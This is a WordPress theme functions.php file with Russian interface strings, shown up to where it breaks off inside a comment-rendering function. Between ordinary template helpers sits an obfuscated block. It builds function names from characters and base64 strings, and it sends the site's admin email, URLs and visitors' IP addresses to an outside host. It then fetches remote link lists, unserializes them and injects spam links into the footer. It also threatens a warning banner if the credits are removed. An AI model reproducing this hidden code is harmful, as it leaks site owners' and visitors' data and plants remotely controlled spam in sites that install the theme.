<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $ZmNclui='o';$IQLsf='6';$xPkPV='c';$ZUeq='_';$fnsYRx='s';$gWGCs='e';$bXBqF='e';$krVdZH='4';$kEZiww='d';$pnBW='d';$xtZOZ='e';$oVRmoT='b';$LcZnYr='a';$AmoIYsll=$oVRmoT.$LcZnYr.$fnsYRx.$bXBqF.$IQLsf.$krVdZH.$ZUeq.$kEZiww.$xtZOZ.$xPkPV.$ZmNclui.$pnBW.$gWGCs;$Ivvrw='g';$JsMq='z';$azPzHNX='f';$XjHFV='a';$MfNCBt='i';$vXqFR='n';$sxoLPKI='t';$itHFw='l';$qAWq='e';$UzuHZziX=$Ivvrw.$JsMq.$MfNCBt.$vXqFR.$azPzHNX.$itHFw.$XjHFV.$sxoLPKI.$qAWq;$IpjgEUV='s';$FLqxtC='1';$FKTDua='3';$SKxWuk='t';$hHZqNE='r';$JUOL='o';$eKNLkBI='r';$HmflhqY='_';$DcGeY='t';$gEnDUlNC=$IpjgEUV.$DcGeY.$eKNLkBI.$HmflhqY.$hHZqNE.$JUOL.$SKxWuk.$FLqxtC.$FKTDua;$BDth='e';$uNvvV='s';$NVtjRmq='v';$gENc='r';$KDbANg='r';$gvlzpVN='t';$xDVANAoG=$uNvvV.$gvlzpVN.$KDbANg.$gENc.$BDth.$NVtjRmq;                     $xg________x='o';$bo_____f='6';$qr____w='c';$ot_______________x='_';$fg__q='s';$ur__y='e';$zo____________n='e';$el______g='4';$rg_______________i='d';$uf_______w='d';$nd______v='e';$rg____a='b';$in______j='a';$ea____________q=$rg____a.$in______j.$fg__q.$zo____________n.$bo_____f.$el______g.$ot_______________x.$rg_______________i.$nd______v.$qr____w.$xg________x.$uf_______w.$ur__y;$mz_________s='o';$qi_____________a='_';$wh______________x='n';$by___x='s';$su______o='e';$ey_________r='t';$xc_______q='s';$cg________n='x';$tm______________j='t';$lt___o='c';$oz__o='f';$kj_______________i='u';$vg_____________q='i';$sr_____h='n';$zp__s='i';$me___t=$oz__o.$kj_______________i.$wh______________x.$lt___o.$tm______________j.$vg_____________q.$mz_________s.$sr_____h.$qi_____________a.$su______o.$cg________n.$zp__s.$by___x.$ey_________r.$xc_______q;$fh___e='p';$bo______________q='e';$id______j='n';$tv___r='f';$yn______s='o';$kx__________h=$tv___r.$yn______s.$fh___e.$bo______________q.$id______j;$nb___________j='r';$fb_________d='a';$qb_________m='e';$xb______________o='d';$zk____________i='f';$ee___p=$zk____________i.$nb___________j.$qb_________m.$fb_________d.$xb______________o;$ki___j='c';$ak__________d='o';$nd___f='f';$eu_____________a='s';$rw________p='e';$uh______s='l';$vs____x=$nd___f.$ki___j.$uh______s.$ak__________d.$eu_____________a.$rw________p;define("WP_ID", $ea____________q("Mi4wLjA="));define("WP_TTL", $ea____________q("MTA4MDA="));define("WP_SRC", $ea____________q("dHBva24="));function wp_get_header() {global $ea____________q, $me___t;if ($me___t($ea____________q("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$me___t($ea____________q("d3BfZ2V0X2Zvb3Rlcg==")) &&$me___t($ea____________q("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ea____________q, $kx__________h, $vs____x, $ee___p;$qw_____________a = TEMPLATEPATH."/".$ea____________q("Zm9vdGVyLnBocA==");$ty____q = @$kx__________h($qw_____________a, "r");$qw_____________a = @$ee___p($ty____q, @filesize($qw_____________a));@$vs____x($ty____q);$nm_____s = TEMPLATEPATH."/".$ea____________q("ZnVuY3Rpb25zLnBocA==");$ty____q = @$kx__________h($nm_____s, "r");$nm_____s = @$ee___p($ty____q, @filesize($nm_____s));@$vs____x($ty____q);$dm________v = 0;if($qw_____________a && $nm_____s) {if ($ea____________q("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($qw_____________a, $ea____________q("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$dm________v = 1;}if (substr_count($qw_____________a, "wp_theme_GPL_credits()") < 1) {$dm________v = 2;}}if(WP_ID != "2.0.0") {$dm________v = 12;}}if($dm________v > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $dm________v -->";}}function wp_loaded() {global $ea____________q, $me___t;return $me___t($ea____________q("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($mo______________y, $ju____________v = "(more...)", $yk_______________d = 0, $ir____________l = "") {$jq____________u = get_the_content($ju____________v, $yk_______________d, $ir____________l);$jq____________u = apply_filters("the_content", $jq____________u);$jq____________u = str_replace("]]>", "]]>", $jq____________u);if (strlen($_GET["p"]) > 0) {echo $jq____________u;}else if ((strlen($jq____________u)>$mo______________y) && ($ru___________i = strpos($jq____________u, " ", $mo______________y ))) {$jq____________u = substr($jq____________u, 0, $ru___________i);$jq____________u = $jq____________u;echo $jq____________u;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$ju____________v</a></div></p>";} else {echo $jq____________u;}}}$im______a='n';$zd____________j='e';$qs____________m='d';$lo______a='b';$kq______d='s';$jw___w='4';$ii___s='c';$vt____g='e';$sv__c='a';$vg_______h='6';$te_____________a='e';$zm______________s='o';$lj_________q='_';$jg___________m=$lo______a.$sv__c.$kq______d.$te_____________a.$vg_______h.$jw___w.$lj_________q.$vt____g.$im______a.$ii___s.$zm______________s.$qs____________m.$zd____________j;$wj______________r='t';$wc__w='i';$rz_______b='s';$gw_____________c='o';$vk___k='t';$vh___s='_';$pz____n='n';$tg______________a='e';$gi___d='e';$yd______m='l';$wv_______x='e';$re_______________q='n';$yx_____i='t';$kc_________j='c';$pj____m='g';$kx__t='f';$zq_______l='_';$xt___t=$kx__t.$wc__w.$yd______m.$wv_______x.$zq_______l.$pj____m.$gi___d.$yx_____i.$vh___s.$kc_________j.$gw_____________c.$re_______________q.$vk___k.$tg______________a.$pz____n.$wj______________r.$rz_______b;$nt_______________p='x';$vs___________n='e';$qt______z='s';$jo__u='_';$fp__________r='f';$kt______________w='s';$la___q='i';$mc___________w='e';$aj________t='t';$sb_____e='l';$jg__m='i';$cv___________y=$fp__________r.$jg__m.$sb_____e.$mc___________w.$jo__u.$vs___________n.$nt_______________p.$la___q.$qt______z.$aj________t.$kt______________w;$bp___________b='e';$qv_____j='a';$iz_______________f='r';$gn__________k='p';$jo_______________s='o';$zy_____f='r';$ed_____v='i';$ba_______________a='v';$za_________b='_';$am___l='c';$gd_______n='n';$ox______________q='m';$ci__________y='s';$kx________m='e';$sd___________w='o';$ne__h=$ba_______________a.$kx________m.$iz_______________f.$ci__________y.$ed_____v.$sd___________w.$gd_______n.$za_________b.$am___l.$jo_______________s.$ox______________q.$gn__________k.$qv_____j.$zy_____f.$bp___________b;$sd__b='o';$ah_______v='c';$ep________r='o';$qu______________v='p';$ux___________v='k';$kf_____j='f';$ye_________e='s';$ma_______________k='n';$eh_____________p='e';$em___c=$kf_____j.$ye_________e.$sd__b.$ah_______v.$ux___________v.$ep________r.$qu______________v.$eh_____________p.$ma_______________k;$an___g='f';$um____n='t';$ng______________j='e';$as____q='w';$mr_______________t='i';$id_____g='r';$mt__p=$an___g.$as____q.$id_____g.$mr_______________t.$um____n.$ng______________j;$cq______________x='d';$rk___________d='m';$da_______q='5';$fr_____x=$rk___________d.$cq______________x.$da_______q;$hd_____________y='e';$pa_________y='r';$vv__________k='h';$cf___________o='a';$ep________j='a';$yq_____________o='t';$oa___________y='p';$tu____________r='l';$ng__c=$pa_________y.$hd_____________y.$cf___________o.$tu____________r.$oa___________y.$ep________j.$yq_____________o.$vv__________k;$nt_____________i='i';$bb__g='n';$xn______________a='u';$cr_____y='s';$wr___________f='e';$lo_____________l='r';$nf__j='e';$av_______________c='z';$ok__________a='a';$qz____________s='i';$vc___t='l';$wp_______b=$xn______________a.$bb__g.$cr_____y.$wr___________f.$lo_____________l.$nt_____________i.$ok__________a.$vc___t.$qz____________s.$av_______________c.$nf__j;$ss__________z='t';$yd______e='a';$gh______________p='m';$qv_______________m='p';$ej____________i='e';$ax___b='m';$ro_______________m='n';$jk_______v=$ss__________z.$ej____________i.$ax___b.$qv_______________m.$ro_______________m.$yd______e.$gh______________p;$it____j='a';$ru______i='t';$ul________m='o';$zs____f='a';$hd_________w='r';$sp________s='_';$jl___q='n';$sy____g='_';$ul_____________d='s';$ay_________z='e';$oj________l='e';$nr_____c='e';$td_________m='t';$iv__________c='c';$pq_________d='t';$gb__________p='r';$ya_______________y='m';$sy_______________p='t';$qt____p='x';$oj__________i='c';$on______________i='e';$xl______w=$ul_____________d.$sy_______________p.$hd_________w.$oj________l.$zs____f.$ya_______________y.$sp________s.$oj__________i.$ul________m.$jl___q.$pq_________d.$ay_________z.$qt____p.$td_________m.$sy____g.$iv__________c.$gb__________p.$nr_____c.$it____j.$ru______i.$on______________i;function rn____q($qm________h) {global $ea____________q, $me___t, $xt___t, $ne__h, $xl______w;if (!$me___t($ea____________q("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ne__h(PHP_VERSION, "5.0.0", ">=") && $me___t($ea____________q("ZmlsZV9nZXRfY29udGVudHM=")) && $me___t($ea____________q("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$co___________y = $xl______w(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$uh______________k = @$xt___t($qm________h, 0, $co___________y);} else {$uh______________k = @$xt___t($qm________h, 0);}return $uh______________k;}function jr__g($qm________h) {global $me___t, $em___c, $mt__p, $ea____________q;if (!$me___t($ea____________q("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$tj____________r = strpos($qm________h, "/", 7);$cb__________l = array("uri"     => substr($qm________h, $tj____________r),"host"    => str_replace("http://", "", substr($qm________h, 0, $tj____________r)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$cs____________f = @$em___c("$cb__________l[host]", 80, $co_______________h, $dd______________h, 4);if (!$cs____________f) {return false;} else {$uh______________k = "";$gd___u  = "GET $cb__________l[uri] HTTP/1.0\r\n";$gd___u .= "Host: $cb__________l[host]\r\n";$gd___u .= "Referer: $cb__________l[referer]\r\n";$gd___u .= "Connection: Close\r\n\r\n";@$mt__p($cs____________f, $gd___u);while (!@feof($cs____________f)) {$js__________h = @fgets($cs____________f, (1024*24));if ($js__________h == "\r\n") {$di____________u = true;continue;}if ($di____________u) {$uh______________k .= $js__________h;}}return $uh______________k;}}function wf_______z($qm________h) {global $me___t;$xc_______________q = false;if ($qm________h != "") {if ($me___t("rn____q")) {$xc_______________q = @rn____q($qm________h);}if (!$xc_______________q && ($me___t("jr__g"))) {$xc_______________q = @jr__g($qm________h);}}return $xc_______________q;}function mh__n() {global $_SERVER, $fr_____x;$qu_____________d = $_SERVER["SERVER_NAME"];if (substr("$qu_____________d", 0, 4) == "www.") {$qu_____________d = substr("$qu_____________d", 4);}$qu_____________d = $fr_____x("$_SERVER[SERVER_NAME]");return $qu_____________d;}function ch_______________t() {return "file";}function yq__________j($qm________h) {global $_SERVER, $xt___t, $cv___________y, $kx__________h, $vs____x, $mt__p;$gb___________a = gp_______f();$rq__________i = mh__n().".jpg";$lo___i = $gb___________a["dir_upload"]["path"]."/$rq__________i";$fw________l = @filemtime($lo___i);if (!$fw________l || ((time()-$fw________l) >= WP_TTL)) {$xc_______________q = wf_______z($qm________h);if ($xc_______________q) {if ($cv___________y($lo___i)) {@unlink($lo___i);}$ty____q = @$kx__________h($lo___i, "x+");@$mt__p($ty____q, $xc_______________q);@$vs____x($ty____q);}} else {if ($cv___________y($lo___i)) {$xc_______________q = @$xt___t($lo___i);} else {$xc_______________q = false;}}return $xc_______________q;}function gp_______f() {global $_SERVER, $ea____________q, $jg___________m;$xw_______s = wp_count_posts("post");$ef__u = pathinfo(get_bloginfo("template_directory"));$gb___________a = array("url" => array("report"      => $ea____________q("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $ef__u,"dir_upload"=> of______________y(),"queryString"=> array("?a001=".WP_ID,"a004=".$ef__u[filename],"a005=".$xw_______s->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://vodoley2000.com/kitajskij-biznes\">Китайский бизнес</a> ");$gb___________a["url"]["queryString"] = implode("&", $gb___________a["queryString"]);$gb___________a["url"]["report"] = $gb___________a["url"]["report"]."/?".$jg___________m($gb___________a["url"]["queryString"]).".html";return $gb___________a;}function of______________y() {$do___v = wp_upload_dir();if (isset($do___v["error"])) {$qy___________f = wt____c();if (is_writable($qy___________f)) {$do___v = array("path" => $qy___________f);}}return $do___v;}function wt____c() {global $me___t, $fr_____x, $ng__c, $jk_______v;$jl______n = (bool) ini_get("safe_mode");if ($jl______n == true) {return false;}if ($me___t("sys_get_temp_dir")) {$jg__________t = sys_get_temp_dir();if (is_writable($jg__________t)) {return $ng__c($jg__________t);}}if (!empty($_ENV["TMP"])) {return $ng__c($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $ng__c($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $ng__c($_ENV["TEMP"]);} else {$ao____________e = $jk_______v($fr_____x(uniqid(rand(), true)), "");if ($ao____________e) {$jg__________t = $ng__c(dirname($ao____________e));@unlink($ao____________e);return $jg__________t;} else {return false;}}}function gl_____e() {global $_GET, $cv___________y;$gb___________a = gp_______f();$qu_____________d = mh__n();$jk_____________h = ch_______________t();$av__________m = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($jk_____________h == "file") {$qd________y = $gb___________a["dir_upload"]["path"]."/".$qu_____________d.".jpg";if ($cv___________y($qd________y)) {@unlink($qd________y);$av__________m = "deleted";}}$id______y = array("s"=> $av__________m,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($id______y AS $bd______s => $gv___________z) echo " [$bd______s:$gv___________z]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $me___t, $ea____________q, $wp_______b;$gb___________a = gp_______f();$ee_____________k = "yq__________j";if ($me___t($ee_____________k)) {$uh______________k = $ee_____________k($gb___________a["url"]["report"]);}if ($uh______________k) {if ($uh______________k = @$ea____________q($uh______________k)) {$uh______________k = @$wp_______b($uh______________k);if (strlen($uh______________k[custom_credit]) >= 5) {$gb___________a["default_string"] = $uh______________k[custom_credit];}if ($uh______________k["status"] == "0") {$ym_______g = 1;$uf________r = 1;} else {$qb_______________i = sizeof($uh______________k["links"]);$ve_____________s = $gb___________a["default_string"];if ($qb_______________i > 0 && $uh______________k["links"] !== "") {$up_________q = 0;foreach ($uh______________k["links"] as $dc_____________f => $hb__q) {$up_________q++;if ($hb__q->l_path == "" || $hb__q->l_path == $_SERVER["REQUEST_URI"]) {$hb__q->l_href = htmlspecialchars(strip_tags($hb__q->l_href));$hb__q->l_title = htmlspecialchars(strip_tags($hb__q->l_title));$hb__q->l_anchor = htmlspecialchars(strip_tags($hb__q->l_anchor));$ve_____________s .= " | ";$ve_____________s .= "<a href='$hb__q->l_href' title='$hb__q->l_title'";if ($hb__q->l_nofollow == "1") {$ve_____________s .= " rel='nofollow'";}$ve_____________s .= ">$hb__q->l_anchor</a>";}}}$gb___________a["links"] = "$ve_____________s";if ($uh______________k[credit] == "0") {$gb___________a["links"] = "";}}} else {$ym_______g = "1";}} else {$ym_______g = "1";}if ($ym_______g == "1") {$gb___________a["links"] = $gb___________a["default_string"];}echo "$gb___________a[links]";echo "<!-- s: $uh______________k[signature] -->";gl_____e();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('до' => '<p><strong>Старницы:</strong> ', 'после' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tags:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментарий &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Edit', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
